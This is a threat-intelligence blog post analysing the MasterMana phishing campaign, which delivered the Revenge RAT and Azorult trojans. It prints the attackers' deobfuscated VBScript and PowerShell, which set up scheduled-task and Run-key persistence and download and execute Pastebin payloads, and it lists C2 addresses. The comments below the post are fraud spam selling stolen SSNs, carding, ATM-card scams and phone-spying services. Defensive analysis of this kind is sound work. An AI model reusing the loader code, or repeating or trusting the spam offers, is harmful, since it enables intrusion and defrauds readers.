Wednesday, October 2, 2019

MasterMana BotNet

The MasterMana Botnet: Anatomy of the $160 Dollar Hack


The team at Prevailion has uncovered new details concerning “MasterMana Botnet,” an ongoing cyber-crime campaign that hits all of the cyber bingo buzzwords: business email compromise, backdoors, and cryptocurrency wallets. There are indications this operation — which targeted corporations around the world for less than the cost of a night at the baseball park — was still active as late as 24 September 2019.

This operation, which began as early as December of 2018, appears financially motivated, given the seemingly indiscriminate targeting of business email addresses via phishing and the inclusion of specific functions to steal information associated with cryptocurrency wallets. Based upon exhibited tactics, techniques, and procedures (TTPs), we have associated it — with moderate confidence — to the “Gorgon Group”, a well known group active for numerous years that has been known to straddle the line between cybercrime and intelligence operations.

Once the victims opened the phishing email it revealed an infected document attachment. Opening the infected document initiated the attack’s multi-pronged, labyrinth-like kill-chain. The layered kill-chain approach aids in evading detection by relying  upon trust placed in a number of third-party websites and services, such as Bitly, Blogspot, and Pastebin, as opposed to exclusively using actor-controlled domains. The threat actors also took the additional steps of modifying older Pastebin posts to cease execution, as well as adding features to avoid some automated detection, such as sandboxing.

Ultimately the victim would download a .NET dll that would perform process hollowing and load a fileless backdoor — either a variant of Azorult or Revenge Rat. The team at Prevailion determined that the threat actors used Revenge Rat, a well-known remote access trojan (RAT) tool that could be found online for free, through the week of September 15th, at which time they switched to Azorult, a well-known trojan previously for sale on certain forums for $100US.

The Azorult trojan was designed to steal usernames, passwords, cookies, web history, and cryptocurrency wallets. It also created with contained functionality to enumerate the host, upload files, download files, and take screenshots of the victim’s machine. This functionality could allow an actor to deploy additional payloads, such as cryptominers and ransomware.

In addition to aiding in detection avoidance, using third-party services also enabled the threat actors to conduct the campaign at minimal cost. Leasing Virtual Private Servers (VPS) costs an estimated $60US, and Azorult versions were available for under $100US via Russian-based cyber-crime forums earlier this year.

This particular campaign highlights the asymmetric nature of these threats. As companies increasingly spend more money on security solutions, threat actors are able to operate on shoestring budgets. In this case, the threat actors struck a perfect balance: sophisticated enough to avoid automated detection through third-party services and obfuscation while remaining below APT-level sophistication to avoid drawing attention to their campaign.

These new details about the wide-scale targeting of this ongoing campaign — dubbed “MasterMana Botnet” — highlight the potential impact of moderately sophisticated campaigns to all corporations and organizations. While most companies fear they may become compromised by advanced actors, this particular report highlights that actors do not have to rely on advanced tools or techniques to have a serious business impact.

We recommend a defense-in-depth strategy with multiple security solutions including properly configured firewalls, email protection, and end-point antivirus solutions.

While the infection mechanism relied upon semi-trusted third party sites, the use of commonly available backdoors made this attack easy to stop for updated and properly-configured endpoint solutions.

Campaign Walk Through

Step 1 - Phishing E-Mails

One observed infection vector used by these threat actors was trojanized Excel documents sent to victims via email. The emails appeared to impersonate business dealings by sending the recipients invoices and product requirements.

In one case, an email impersonated a small-sized legitimate company based out of Dubai, UAE. Both of the emails that we discovered were sent from free email providers, such as Yahoo and Yandex.  

Phishing email sent from free webmail provider to potential victim

Phishing email sent from a potentially compromised account

Step 2 - Infected Document Attachments

Once the victim received the email, presumably they would then download the infected file attachment. In one case, the Excel document attachment would prompt the victim to then enable a macro. Once macros were enabled, the VBS script would reach out to a Bitly link.

In another instance, a different Microsoft excel file was attached, which used the Dynamic Data Exchange (DDE) exploit, CVE-2017-11826.  Similar to the previous sample, when the document was opened, the OLE object automatically reached out to an embedded bitly link.

Additionally, we saw references in the code that indicated the threat actors could have trojanized the following Microsoft file formats:

Step 3 - Bitly Link Redirection to “TeamMana” Blogspot

The victim machine would then attempt to resolve the embedded Bitly link. Once the link was expanded, it would direct the victim to an actor-controlled hostname associated with Blogspot.

The team at Prevailion observed the same hostname in use across multiple campaigns however, the expanded bitly links correlated to different URLs. One of the more popular campaigns occurred in late August and continued through September. This particular link appeared to have been clicked approximately 2200 times from end users located around the globe.

Bitly metrics showing the number of times the link has been clicked associated with the September 9th Campaign 

Bitly metrics showing the number of times the link has been clicked associated with the September 15th Campaign 

Once expanded, the Bitly links would bring the victim to a URL associated with the hostname myownteammana[.]blogspot[.]com. If the website was visited in a web browser, the site appeared benign. Upon further inspection, however, we discovered the presence of malicious JavaScript within the webpage.

Screenshot of the actor-controlled blogspot webpage

Once the embedded javascript was decoded, it revealed a VBS Script that ran mshta.exe on code found on a Pastebin URL.

Step 4 - Creating Scheduled Tasks and Registry Keys

The Pastebin URL would reveal another javascript snippet. Similar to the previous step, the Pastebin file was a URL-encoded VBScript that was obfuscated using some simple tricks such as string reversals and unnecessary concatenations to avoid detection. Once deobfuscated, the script would kill any running instances of MS Word, Excel, Powerpoint, and Publisher.

Next, it would attempt to create scheduled tasks and modify a registry key to obtain the next payload. One interesting aspect was the inclusion of a time delay on the scheduled task, which likely aided in avoiding detection from a certain sandbox environment that may have had a timer of five minutes 

At the end of September, the threat actor began modifying their TTPs to use three scheduled tasks and one registry key, instead of two. These scheduled tasks would kick off after six minutes then five hours and then ten hours. Then, the registry key instance would persist after a reboot.

<script language="VBScript">
CreateObject("WScript.Shell").Run "cmd.exe /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit", vbHide

CreateObject("WScript.Shell").Run schtasks /create /sc MINUTE /mo 06 /tn ""Windows Update"" /tr ""mshta.exe{Specific URL}"" /F , vbHide

CreateObject("WScript.Shell").Run schtasks /create /sc MINUTE /mo 300 /tn ""Update"" /tr ""mshta.exe{Specific URL}"" /F , vbHide

CreateObject("WScript.Shell").Run schtasks /create /sc MINUTE /mo 600 /tn ""Genuine"" /tr ""mshta.exe{Specific URL}"" /F , vbHide

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AvastUpdate","mshta.exe{Specific URL}","REG_EXPAND_SZ"
Self.close </script>

Step 5 -  Downloading and Loading the Trojan

Once the scheduled tasks and registry keys were created, they were then populated with the contents of another Pastebin URL. Interestingly, our team noticed that some of the older Pastebin posts were modified to cease execution of the kill-chain.

We assess that these older Pastebin posts were almost certainly modified by the threat actor, potentially after a set period of time. This suggests that the threat actors are taking steps to remove older links, thereby protecting their tools and operations. One of the active links provided a URL-encoded string that decoded to the text below.

Screenshot of the URL decoded VBScript

That PowerShell command was obfuscated by both reversing the order of the string and by expressing in comma-delimited, base-10 CharCode. One of the tools that we used in decoding these various commands was CyberChef.

Screenshot of the cyberchef, using “reverse” and “from charcode” modules to deobfuscate the script

The plaintext PowerShell script used in the September 15th campaign can be viewed below.

[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');
$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'hxxps://pastebin[.]com/raw/{Specific URL}')|IEX;
[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'hxxps://pastebin[.]com/raw/{Specific URL}').replace('!#@','0x')|IEX;

Prior to the 15th, the threat actors used a slightly modified script. This older variant had certain functionality to confirm that the machine had access to the internet before running. The variant also used MBuild.exe. We suspect the adversary chose MSBuild because it is a signed Microsoft binary, and using this process could allow them to bypass some application whitelisting controls on the host as they used it to execute arbitrary code.

do {$ping = test-connection -comp -count 1 -Quiet} until ($ping);[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');
$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'{Specific URL}')|IEX;[
Byte[]]$f=[Microsoft.VisualBasic.Intraction]::CallByname((New-ObjectNet.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'{Specific URL}').replace('#!','0x')|IEX;
[email protected]('MSBuild.exe',$f);

The first Pastebin sample downloaded from the script was heavily obfuscated. Once it was URL-decoded, it revealed a PowerShell script that was obfuscated using base-10 CharCode. The deobfuscated text revealed another large string of hex characters. However, to further evade detection and obfuscate the code, the “0x” that typically precedes the hex was replaced with “%_”. The PowerShell would replace, ”%_” with “0x” right before execution. Once the replacement was complete, we were able to extract a Dynamically-linked Library (.dll) written in .Net.

The second Pastebin sample we downloaded from the script was more semi-obfuscated. Similar to the previous samples, the threat actors appended “!#@” in front of the hex characters, likely to evade detection. However, prior to execution, the string “!#@”  would be replaced with “0x” to download a fully functional RAT.

Step 6 - Analysis of the Process Hollower and Trojan

The .NET dll sample associated with this particular campaign was obfuscated using an open-source project called “ConfuserEx” from GitHub. Thankfully,“de4dot” is another available open-source project, which can be used to deobfuscate the samples.

This serves as a hollow process injector for the “notepad.exe”, from step 5 above. It also passes a byte array with the PE data from the PowerShell script. It looks for notepad.exe in windows\syswow64 and then calls “MyVictim.tickleme”, which zeros the PE headers from the buffer and calls VOVO.FUN.

VOVO.FUN then launches notepad, unmaps the existing section, allocates a new buffer in the notepad process, writes additional payloads into the process, and resumes the thread. This allowed the threat actors to never write the malware to disk. The actors maintained persistence schedule tasks, which will periodically grab the injector and RAT, and hollow out the memory of a process that points to a valid image on disk.

Screenshot of the process hollowing dll

In an operation that occurred on September 9th, 2019, the threat actors deployed Revenge Rat. 
This particular agent communicated with a duckdns domain, hxxp://speeddfox[.]duckdns[.]org, and it generated a MUTEX string, named "WindowsUpdateSysten32". These characteristics, such as the use of Revenge Rat and the MUTEX string, allowed us to draw parallels to a campaign previously reported by other security firms, that they associated to the “Gorgon Group”.

Screenshot of the Revenge Rat’s C2 and MUTEX string

Approximately one week later, on September 15th, we observed an evolution of TTPs, using Azorult, in lieu of Revenge Rat. Azorult was a well-known trojan, and this particular variant was written in Delphi. As noted by other security researchers, Azorult has been available for sale on Russian forums at prices ranging up to $100US.

While this trojan may have been older, it was still highly effective. Most of the functionality was geared towards harvesting credentials that could be found on the victim machine — e.g., email accounts, messengers applications (e.g., pidgin, psi+, telegram), web cookies, browser history, and cryptocurrency wallets.

Functionality to harvest cryptocurrency wallets

It also had traditional trojan functionalities, such as host-based enumeration and the ability to upload and download files, as well as take screenshots. Once the trojan had obtained the information, it would then communicate with a hard-coded IP address; two such C2 were hxxp://216.170.126[.]146/2ky/index.php and hxxp:// We assess that these threat actors likely configured their C2s using another GitHub Project.

 Pastebin Insights

A review of the open-sourced insights from Pastebin provided a couple of interesting takeaways and insights into this campaign. 

The threat actors’ use of third-party websites, such as Bitly, Blogspot, and Pastebin was likely done to evade detection, as those sites would have been less likely to arouse suspicion from network defenders. Yet, websites such as Bitly and Pastebin keep metrics on how many times a certain link has been visited, We were able to determine who created this particular Pastebin post and summarize how many times it had been visited.

For example, we observed that the URL that hosted the Revenge Rat sample had been viewed over 3300 times. This suggests that there are 3300 machines that were affected by this campaign. However, because the threat actors used a known trojan, the number of machines affected could be much lower, as many machines may have had antivirus products in place.

Pastebin URL ending in “LJV1Hn3g” which decodes to Revenge Rat

Pastebin URL ending in “xAnP1Xjc” which decodes to Azorult Rat

We noticed that, six days later, the same Pastebin creator “hagga” created a new post that decoded to the aforementioned Azorult trojan. With a little over 1000 views, if these two operations are representative of a standard week, we surmise that these threat actors potentially interacted with approximately 2000 machines per week. While this number likely does not reflect the number of actively compromised machines by this threat actor, it does provide us with a snapshot to better understand the breadth of their operations.

Upon further inspection of the Pastebin creator “hagga”, it appears that this Pastebin account was created on December 3rd, 2018. Thus, we suspect this activity has been occurring since that time. We also discovered one interesting Pastebin post title: “MasterManabots-all-bots”. From this, and the reference to “Mana” in the blogspot hostname, we suspect the actors refer to this campaign as the “MasterMana Botnet”.

Screenshot of the Pastebin post ending in “cUcUDfLf” called “Mastermanbots-all-bots”


We found two aspects of this campaign particularly interesting:

      The cost for the threat actors to deploy and maintain the campaign was virtually nonexistent.
      The campaign showed a very specific level of sophistication, tailored intentionally to evade detection.

Regarding the low monetary cost associated with this campaign, we observed that the threat actors leaned heavily on various third-party services. For example, they sent malicious documents using free web mail accounts. They then could have used an open-source project to generate a DDE payload or macro and had the macro reach out to a Bitly link. This link then resolved to a free Blogspot site, hosted by Google, which redirected to various Pastebin sites. Finally, they used an older trojan that likely cost approximately $100. Thus, the only real cost associated with this particular campaign appears to be that of leasing the VPSs.

Based on the level of sophistication displayed in this campaign, we believe that the threat actors struck a sweet spot. The longevity of this campaign can be partially attributed to the threat actors’ ability to avoid using popular commodity malware, such as Emotet.  Simultaneously, they avoided the use of (and subsequently, the potential burning of) zero-day exploits and custom backdoors. We speculate that this helped them obtain a higher return on investment, since they weren’t spending significant resources on tools and exploits.

This campaign’s threat actors saw an opportunity and appear to have carved out a nice niche for themselves. We suspect that this particular threat actor is likely to continue operations, as previous public reporting has not deterred them, therefore we wanted to highlight their new modus operandi, so that network defenders may more easily identify their operations.

About Prevailion

Prevailion is a compromise intelligence company, transforming the way organizations approach risk mitigation and business decision-making. Through next-level tailored intelligence and a zero-touch platform, Prevailion provides confirmed evidence of compromise for customers and their partner ecosystems.

To learn more about Prevailion, visit

Indicators of Compromise

Campaign 1 - Revenge Rat (September 9th)
Xls File:680056b56c29afcce275de93ac5bb06076358410c05caae7f19572909d2d6071

Campaign 2 - Azorult (15 September)

Campaign 3 - Azotul (24 September)

Emails (Sha256 Hashes)

Trojanized Documents

Bitly URLs

.Net DLL used to Process Hollowing

Revenge RAT

Delphi version of Azorult RAT

Command and Control Nodes


  1. Replies
    1. Hello all
      am looking few years that some guys comes into the market
      they called themselves hacker, carder or spammer they rip the
      peoples with different ways and it’s a badly impact to real hacker
      now situation is that peoples doesn’t believe that real hackers and carder scammer exists.
      Anyone want to make deal with me any type am available but first
      I‘ll show the proof that am real then make a deal like

      Available Services

      ..Wire Bank Transfer all over the world

      ..Western Union Transfer all over the world

      ..Credit Cards (USA, UK, AUS, CAN, NZ)

      ..School Grade upgrade / remove Records

      ..Spamming Tool

      ..keyloggers / rats

      ..Social Media recovery

      .. Teaching Hacking / spamming / carding (1/2 hours course)

      discount for re-seller

      Contact: 24/7

      [email protected]

  2. Nowadays, crypto trading has become very popular more than stock market trading. In this crypto trading crypto calls can play a vital role. Because when the trading limit is high on that time if you do trade then it is for sure that you'll gain so much profit.

  3. Hey Guys !

    USA Fresh & Verified SSN Leads with DL Number AVAILABLE with 99.9% connectivity
    All Leads have genuine & valid information

    First Name | Last Name | SSN | Dob | DL Number | Address | City | State | Zip | Phone Number | Account Number | Bank Name | Employee Details | IP Address

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If anyone buy in bulk, we can negotiate
    *Sampling is just for serious buyers

    ->$5 PER EACH

    ->Hope for the long term deal
    ->Interested buyers will be welcome

    **Contact 24/7**
    Whatsapp > +923172721122
    Email > [email protected]
    Telegram > @leadsupplier
    ICQ > 752822040

  4. Are you interested in trading bitcoin binary and forex trade where you can earn 100% of your investment daily If you invest as low as $200 you will get a profit of $2,000 after 72 hours if you are intrested you can contact him via email: [email protected] +12132951376(WHATSAPP)

  5. Hi guys, i must confess i just came across a reliable and incredible hacker who helped me track my cheating Wife, you don't have to stress yourself anymore, if you have the strange feelings about your husband or wife is cheating on you, be smart enough to contact him at T-H-E-R-E-D-H-A-C-K-E-R-G-R-O-U-P- (AT) Ggmail com) whatsapp/text (+1 571 318 9498) You don’t have to touch her phone or computer while you have access to her privacy/conversations ( Text Messages, Whatsapp, Facebook , IG, Snapchat, iMessage, Messenger) through the software he bought and install remotely on my phone. He also retrieved lost bitcoin from any kind of wallet, i don't know how he did this but i think he's perfect at it.Tell him IRENE referred you, a trial will convince you, then you can thank me later. God bless.

  6. It is very impressive strategy. You can include business process outsourcing company to support your customer handling sites. It will save your capital and man-power also.


  7. Hi Viewers Get your Blank ATM card that works in all ATM machines all over the world.. We have specially programmed ATM cards that can be used to hack ATM machines, the ATM cards can be used to withdraw at the ATM or swipe, at stores and POS. We sell this cards to all interested buyers worldwide, the card has a daily withdrawal limit of $1,000 on ATM and up to $20,000 spending limit in stores depending on the kind of card you order for, we are here for you anytime, any day. Email; ([email protected]) I'm grateful to Mike because he changed my story all of a sudden . The card works in all countries except, contact him now ([email protected])

  8. Are you interested in any kinds of hacking services?
    Feel free to contact TECHNECHHACKS.

    For years now we’ve helped so many organizations and companies in hacking services.
    TECHNECHHACKS is a team of certified hackers that has their own specialty and they are five star rated hackers.

    We give out jobs to hackers (gurus only) to those willing to work, with or without a degree, to speed up the availability of time given to jobs!!

    Thus an online binary decoding exam will be set for those who needs employment under the teams establishment.

    we deal with the total functioning of sites like,

    • SOCIAL MEDIA (Facebook, Twitter, Instagram, Snapchat, google hangout etc.)


    • IOS/OS




    Our special agents are five star rated agents that specializes in the following, and will specially be assigned to you for a special job well DONE.








    Thus bewere of scammers because most persons are been scammed and they ended up getting all solutions to their cyber bullies and attacks by US.

    I am Jason williams one of the leading hack agent.


    And our WORK SUCCESS IS 100%!!!

    We’re always available for you when you need help.

    Contact or write us on:

    [email protected]


    Jason. W

    2020©️All Right Reserved

  9. This post is extremely radiant. I extremely like this post. It is outstanding amongst other posts that I ve read in quite a while. Much obliged for this better than average post. I truly value it! Top cryptocurrency blog

  10. Greetings....

    Check out these Credit Cards today.
    My name is Mitch Vanessa from Key West Florida. A successful business owner and father. I got one of these already programmed Credit cards that allows me to withdraw a maximum of $7,500 daily for 30 days. I am so happy about these cards because I received mine last week and have already used it to get $45,000. Mr. Frank Carlos of Email: [email protected]  is giving out these cards to support people in any kind of financial problem. I must be sincere to you, when i saw the advert, I believed it to be illegal and a hoax but when I contacted Mr. Frank Carlos, he confirmed to me that although it is illegal, nobody gets caught while using these cards because they have been programmed to disable every communication once inserted into any Automated Teller Machine(ATM). If interested contact him as soon as possible Email: [email protected]

    WhatsApp: +1-781-656-7138.

  11. GET RICH WITH BLANK ATM CARD ... Whatsapp: +18033921735

    I want to testify about Dark Web blank atm cards which can withdraw money from any atm machines around the world. I was very poor before and have no job. I saw so many testimony about how Dark Web hackers send them the atm blank card and use it to collect money in any atm machine and become rich. ( [email protected] ) I email them also and they sent me the blank atm card. I have use it to get 90,000 dollars. withdraw the maximum of 5,000 USD daily. Dark Web is giving out the card just to help the poor. Hack and take money directly from any atm machine vault with the use of atm programmed card which runs in automatic mode.

    Email: [email protected]
    Text & Call or WhatsApp: +18033921735

  12. There is need of many technology in business. You can get it for reducing your time control. You can use Téléphonie IP Montréal for the rapport system. It can provide you stable network and reduce the cost.

  13. Greetings....

    Check out these Credit Cards today.
    My name is Joseph Eric from Key West Florida. A successful business owner and father. I got one of these already programmed Credit cards that allows me to withdraw a maximum of $7,500 daily for 30 days. I am so happy about these cards because I received mine last week and have already used it to get $45,000. Mr Frank Carlos of Email: [email protected]  is giving out these cards to support people in any kind of financial problem. I must be sincere to you, when i saw the advert, I believed it to be illegal and a hoax but when I contacted Mr Frank Carlos, he confirmed to me that although it is illegal, nobody gets caught while using these cards because they have been programmed to disable every communication once inserted into any Automated Teller Machine(ATM). If interested contact him as soon as possible Email: [email protected]

    WhatsApp: +1-781-656-7138.

  14. Instead of getting a loan, I got my already programmed blank ATM card to withdraw a maximum of $ 5,000 daily for 30 days. I am so happy about this because i got mine last week and I have used it to get $ 50,000. Mr Mike is giving out the card just to help the poor and needy though it is illegal but it is something nice and he is not like other people pretending to have the blank ATM cards. And no one gets caught when using the card. get yours from him i fully recommend him. Just send him an email on ([email protected]) whatsapp us Contact us today for more enlightenment +1 (765) 705-0044


The Gh0st Remains the Same

Author:  Danny Adamitis   Executive Summary  Prevailion’s Tailored Intelligence Team has detected a new advanced campaign dubbed - “...